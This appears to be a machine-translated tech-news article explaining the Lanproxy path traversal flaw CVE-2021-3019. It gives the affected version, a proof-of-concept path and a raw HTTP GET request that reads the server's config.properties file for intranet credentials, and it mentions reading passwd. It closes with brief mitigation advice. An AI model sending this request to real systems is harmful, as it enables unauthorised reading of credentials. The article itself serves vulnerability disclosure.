How to understand the Lanproxy path traversal vulnerability CVE-2021-3019 02/23 Update SLTechnology News&Howtos

How to understand the Lanproxy path traversal vulnerability CVE-2021-3019

2025-02-23 Update From: SLTechnology News&Howtos shulou NAV: SLTechnology News&Howtos > Network Security >

Shulou(Shulou.com)05/31 Report--

Lanproxy path traversal vulnerability CVE-2021-3019 how to understand, I believe that many inexperienced people do not know what to do, so this paper summarizes the causes of the problem and solutions, through this article I hope you can solve this problem.

Lanproxy path traversal vulnerability (CVE-2021-3019)

I. brief introduction of loopholes

Lanproxy is an intranet penetration tool that proxies LAN PCs and servers to the public network, supports tcp traffic forwarding, and supports any tcp upper layer protocol (access to intranet websites, local payment interface debugging, ssh access, remote desktop, etc.) this Lanproxy path traversal vulnerability (CVE-2021-3019) reads arbitrary files through.. / bypass. The vulnerability allows directory traversal to read /.. / conf/config.properties to obtain credentials for intranet connections.

Second, influence the version

Lanproxy 0.1

III. Recurrence of loopholes

Environment installation step:

Https://www.jianshu.com/p/6482ac354d34

Poc:/../conf/config.properties

GET/../conf/config.propertiesHTTP/1.1Host: 127.0.0.1:8080Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10 / 15 / 7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.67 Safari/537.36 Edg/87.0.664.52Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3 Q=0.9Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6Connection: close

Read passwd

Curl access is also fine.

IV. Safety recommendations

Upgrade version, and firewall do related path.. / jump limit.

After reading the above, have you mastered how to understand the Lanproxy path traversal vulnerability CVE-2021-3019? If you want to learn more skills or want to know more about it, you are welcome to follow the industry information channel, thank you for reading!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.

*The comments in the above article only represent the author's personal views and do not represent the views and positions of this website. If you have more insights, please feel free to contribute and share.